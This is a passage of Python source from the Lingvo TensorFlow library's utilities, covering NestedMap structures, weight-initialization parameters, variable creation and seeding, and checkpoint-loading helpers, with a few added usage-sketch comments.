del self[name]
except KeyError as e:
raise AttributeError('%s; available attributes: %s' %
(e, sorted(list(self.keys()))))
def copy(self): # Don't delegate w/ super: dict.copy() -> dict.
return NestedMap(self)
def __deepcopy__(self, unused_memo):
"""Deep-copies the structure but not the leaf objects."""
return self.DeepCopy()
def DeepCopy(self):
"""Deep-copies the structure but not the leaf objects."""
return self.Pack(self.Flatten())
@staticmethod
def FromNestedDict(x):
"""Converts every dict in nested structure 'x' to a NestedMap."""
if isinstance(x, dict):
res = NestedMap()
for k, v in six.iteritems(x):
res[k] = NestedMap.FromNestedDict(v)
return res
elif isinstance(x, (list, tuple)):
return type(x)(NestedMap.FromNestedDict(v) for v in x)
else:
return x
@staticmethod
def CheckKey(key):
"""Asserts that key is valid NestedMap key."""
assert isinstance(key, six.string_types) and _NAME_PATTERN.match(key), key
def GetItem(self, key):
"""Gets the value for the nested `key`.
    Note that indexing lists is not supported; names with underscores are
    treated as a single key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
Returns:
The value for the given nested key.
Raises:
KeyError if a key is not present.
"""
current = self
# Note: This can't support lists. List keys are ambiguous as underscore is
# not reserved for list indexing but also allowed to be used in keys.
# E.g., this is a valid nested map where the key 'a_0' is not well defined
# {'a_0': 3, 'a': [4]}.
for k in key.split('.'):
current = current[k]
return current
def Get(self, key, default=None):
"""Gets the value for nested `key`, returns `default` if key does not exist.
    Note that indexing lists is not supported; names with underscores are
    treated as a single key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
default: Optional default value, defaults to None.
Returns:
The value for the given nested key or `default` if the key does not exist.
"""
try:
return self.GetItem(key)
# TypeError is raised when an intermediate item is a list and we try to
# access an element of it with a string.
except (KeyError, TypeError):
return default
def Set(self, key, value):
"""Sets the value for a nested key.
    Note that indexing lists is not supported; names with underscores are
    treated as a single key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
value: The value to insert.
Raises:
ValueError if a sub key is not a NestedMap or dict.
"""
current = self
sub_keys = key.split('.')
for i, k in enumerate(sub_keys):
self.CheckKey(k)
# We have reached the terminal node, set the value.
if i == (len(sub_keys) - 1):
current[k] = value
else:
if k not in current:
current[k] = NestedMap()
if not isinstance(current[k], (dict, NestedMap)):
raise ValueError('Error while setting key {}. Sub key "{}" is of type'
' {} but must be a dict or NestedMap.'
''.format(key, k, type(current[k])))
current = current[k]
def _RecursiveMap(self, fn, flatten=False):
"""Traverse recursively into lists and NestedMaps applying `fn`.
Args:
fn: The function to apply to each item (leaf node).
flatten: If true, the result should be a single flat list. Otherwise the
result will have the same structure as this NestedMap.
Returns:
The result of applying fn.
"""
def Recurse(v, key=''):
"""Helper function for _RecursiveMap."""
if isinstance(v, NestedMap):
ret = [] if flatten else NestedMap()
deleted = False
for k in sorted(v.keys()):
res = Recurse(v[k], key + '.' + k if key else k)
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret[k] = res
if not ret and deleted:
return self._DELETE
return ret
elif isinstance(v, list):
ret = []
deleted = False
for i, x in enumerate(v):
res = Recurse(x, '%s[%d]' % (key, i))
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret.append(res)
if not ret and deleted:
return self._DELETE
return ret
else:
ret = fn(key, v)
if flatten:
ret = [ret]
return ret
res = Recurse(self)
if res is self._DELETE:
return [] if flatten else NestedMap()
return res
def Flatten(self):
"""Returns a list containing the flattened values in the `.NestedMap`.
Unlike py_utils.Flatten(), this will only descend into lists and NestedMaps
and not dicts, tuples, or namedtuples.
"""
return self._RecursiveMap(lambda _, v: v, flatten=True)
def FlattenItems(self):
"""Flatten the `.NestedMap` and returns <key, value> pairs in a list.
Returns:
A list of <key, value> pairs, where keys for nested entries will be
represented in the form of `foo.bar[10].baz`.
"""
return self._RecursiveMap(lambda k, v: (k, v), flatten=True)
def Pack(self, lst):
"""Returns a copy of this with each value replaced by a value in lst."""
assert len(self.FlattenItems()) == len(lst)
v_iter = iter(lst)
return self._RecursiveMap(lambda unused_k, unused_v: next(v_iter))
def Transform(self, fn):
"""Returns a copy of this `.NestedMap` with fn applied on each value."""
return self._RecursiveMap(lambda _, v: fn(v))
def IsCompatible(self, other):
"""Returns true if self and other are compatible.
If x and y are two compatible `.NestedMap`, `x.Pack(y.Flatten())` produces y
and vice versa.
Args:
other: Another `.NestedMap`.
"""
items = self._RecursiveMap(lambda k, _: k, flatten=True)
other_items = other._RecursiveMap(lambda k, _: k, flatten=True) # pylint: disable=protected-access
return items == other_items
def Filter(self, fn):
"""Returns a copy with entries where fn(entry) is True."""
return self.FilterKeyVal(lambda _, v: fn(v))
def FilterKeyVal(self, fn):
"""Returns a copy of this `.NestedMap` filtered by fn.
If fn(key, entry) is True, the entry is copied into the returned NestedMap.
Otherwise, it is not copied.
Args:
fn: a callable of (string, entry)->boolean.
Returns:
      A `.NestedMap` containing the copied entries from this `.NestedMap`.
"""
return self._RecursiveMap(lambda k, v: v if fn(k, v) else self._DELETE)
def _ToStrings(self):
"""Returns debug strings in a list for this `.NestedMap`."""
kv = self.FlattenItems()
maxlen = max([len(k) for k, _ in kv]) if kv else 0
return sorted([k + ' ' * (4 + maxlen - len(k)) + str(v) for k, v in kv])
def DebugString(self):
"""Returns a debug string for this `.NestedMap`."""
return '\n'.join(self._ToStrings())
def VLog(self, level=None, prefix=None):
"""Logs the debug string at the level."""
if level is None:
level = 0
if prefix is None:
prefix = 'nmap: '
for l in self._ToStrings():
tf.logging.vlog(level, '%s %s', prefix, l)
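# Illustrative usage sketch (not from the original source); all field names and
# shapes below are made up.
#
#   theta = NestedMap(fc=NestedMap(w=tf.zeros([4, 8]), b=tf.zeros([8])))
#   theta.Set('proj.w', tf.zeros([8, 2]))   # creates the 'proj' sub-map
#   flat = theta.Flatten()                  # leaves, ordered by sorted keys
#   same = theta.Pack(flat)                 # same structure, same leaves
#   weights_only = theta.FilterKeyVal(lambda k, v: k.endswith('.w'))
#   assert theta.GetItem('fc.b') is theta.fc.b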
class _Unique(object):
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (v in self._vset):
return False
else:
self._vset.add(v)
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper(object):
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
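# Illustrative usage sketch (not from the original source); the keys below are
# made up.
#
#   view = ReadOnlyAttrDictView({'lr': 0.1, 'clip': 5.0})
#   assert view.lr == view['lr'] == 0.1
#   view.lr = 0.2   # raises AttributeError('Dictionary is read-only.')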
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler(object):
"""A reservoir sampler.
  This class implements reservoir sampling: given a limit of `num_samples`
  stored samples, every item added to the sampler is kept with equal
  probability (`num_samples` / number of items seen so far).
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
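# Illustrative usage sketch (not from the original source): keep a uniform
# sample of at most 10 items from a stream of 1000 items.
#
#   sampler = UniformSampler(num_samples=10)
#   for item in range(1000):
#     sampler.Add(item)
#   assert len(sampler.samples) == 10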
class RNNCellStateInit(object):
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
    shape: An array of ints/symbols specifying the shape of the state.
    init: Hyperparameters as returned by one of the static implementations in
      RNNCellStateInit.
    dtype: The dtype of the states. Defaults to tf.float32.
name: An optional name for the operation.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit(object):
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random_uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random_uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
def IsDefaultParamInit(p):
return (p.method == 'xavier' and p.scale == _DEFAULT_XAVIER_INIT and
p.seed is None)
def WeightParams(shape, init=None, dtype=None, collections=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
return p
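# Illustrative sketch (not from the original source): describing a projection
# weight with a Gaussian initializer scaled by 1/sqrt(fan_in). The shape and
# name are made up.
#
#   proj_w_params = WeightParams(
#       shape=[1024, 512],
#       init=WeightInit.GaussianSqrtFanIn(scale=1.0),
#       dtype=tf.float32)
#   # 'proj_w_params' can then be passed to CreateVariable() below.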
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
def FindNeededInList(tensor_list, endpoints):
"""Return tensors from tensor_list needed to compute any of endpoints."""
all_needed = FindNeeded(endpoints)
return [t for t in tensor_list if t.name in all_needed]
class _CollectionGetter(object):
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
return key.replace('[', '_').replace(']', '')
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With OPPORTUNISTIC_VARIABLE_REUSE==True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse existing variables or create new ones
_OPPORTUNISTIC_VARIABLE_REUSE_KEY = ('__lingvo_opportunistic_variable_reuse',)
_get_opportunistic_variable_reuse = _CollectionGetter(
_OPPORTUNISTIC_VARIABLE_REUSE_KEY, lambda: [False])
_VARIABLE_RENAME_RULES_KEY = ('__lingvo_variable_rename_rules',)
_get_rename_rules_stack = _CollectionGetter(_VARIABLE_RENAME_RULES_KEY,
lambda: [])
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
old_val = opportunistic_var_reuse[0]
opportunistic_var_reuse[0] = enable_opportunistic_reuse
yield
opportunistic_var_reuse[0] = old_val
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
return opportunistic_var_reuse[0]
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
rename_rules_stack = _get_rename_rules_stack()
rename_rules_stack.append(renames)
yield
rename_rules_stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _get_rename_rules_stack():
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
def GenerateSeedFromName(name):
"""Generate a random seed from a name string."""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return int(md5.hexdigest(), 16) % (2**31 - 1)
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = _ThreadLocalStack().stack
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.append(shape_prefix)
yield
_VARIABLE_SHAPE_PREFIXES.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES
def GetFanInFanOut(shape):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < 1:
return 1, 1
elif len(shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return shape[0], shape[0]
else:
receptive_field_size = 1
for s in shape[:-2]:
receptive_field_size *= s
fan_in = shape[-2] * receptive_field_size
fan_out = shape[-1] * receptive_field_size
return fan_in, fan_out
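# Illustrative note (not from the original source): for a 3x3 conv kernel of
# shape [3, 3, 64, 128], the receptive field size is 3 * 3 = 9, so
# GetFanInFanOut returns (fan_in, fan_out) == (9 * 64, 9 * 128) == (576, 1152).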
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
init_wrapper=None,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
init_wrapper: a callback which takes a tf initializer callable and returns a
tensor. It is used when shape of the variable isn't statically
determinable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
    synchronization: Indicates when a distributed variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
tf.identity(var), var pair. The tf.identity() node is colocated
with var. In the case of FLAGS.no_identity_on_vars, simply returns
a var, var pair.
"""
p = params.Copy()
assert isinstance(p, hyperparams.Params)
dtype = p.dtype
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
p.Set(shape=shape)
dim0 = 1
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
if tf.get_default_graph().seed is not None:
    # We are in a program/test which needs deterministic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
seed = GenerateSeedFromName(var_name)
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
init_dtype = dtype.real_dtype
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout'
]:
v_init = tf.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = tf.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = tf.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling']:
v_init = tf.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = tf.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = tf.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
# pylint: disable=unused-argument
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random_uniform(shape, -limit, limit, dtype, seed)
# pylint: enable=unused-argument
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = tf.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type not supported.'
if init_wrapper:
assert shape is None, (
'Expecting \'params.shape\' being None when '
'\'init_wrapper\' is specified, instead getting %s') % p.shape
    # The variable will later be initialized from a Tensor value instead of an
    # initializer callable.
v_init = init_wrapper(init_dtype, v_init)
if dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
def GetVar(reuse=reuse):
"""reuse: Whether to reuse the variables."""
if shape is not None:
var_shape = GetVariableShapePrefixes() + list(shape)
else:
var_shape = None
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=scope.use_resource or use_resource_variables())
with tf.variable_scope(var_scope), \
tf.variable_scope(var_name, reuse=reuse) as scope:
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
else:
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
if _get_opportunistic_variable_reuse()[0]:
try:
var = GetVar()
except ValueError: # Possibly the variable already exists
var = GetVar(reuse=True)
else:
var = GetVar()
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p, ('Cached config:\n %s vs new config:\n %s' %
(cached.ToText(), p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.Copy()
for col in p.collections:
tf.add_to_collection(col, var)
if _FromGlobal('no_identity_on_vars'):
with tf.device(var.device):
return var, var
else:
    # This tf.identity is colocated with var.
with tf.device(var.device):
return tf.identity(var), var
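# Illustrative usage sketch (not from the original source): creating a variable
# from a WeightParams inside a layer's variable scope. The names and shape are
# made up.
#
#   with tf.variable_scope('my_layer'):
#     w_params = WeightParams(shape=[16, 4], init=WeightInit.Xavier())
#     w, w_var = CreateVariable('w', w_params)
#   # 'w' is a tf.identity of the variable, colocated with it; 'w_var' is the
#   # tf.Variable itself (e.g. for optimizer variable lists).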
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
    # module load time, because it lets us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = []
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.append(global_step_tensor)
try:
yield
except:
raise
finally:
_GLOBAL_STEP_STACK.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK:
return _GLOBAL_STEP_STACK[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(
GetGlobalVariableScope(), use_resource=use_resource_variables()):
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity(object):
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
vars_to_load = []
for model_var in all_vars:
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match or any(
re.match(r, model_var.name) for r in var_ignore_rules):
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s', model_var, checkpoint_var_name)
vars_to_load.append((checkpoint_var_name, model_var))
break
return vars_to_load
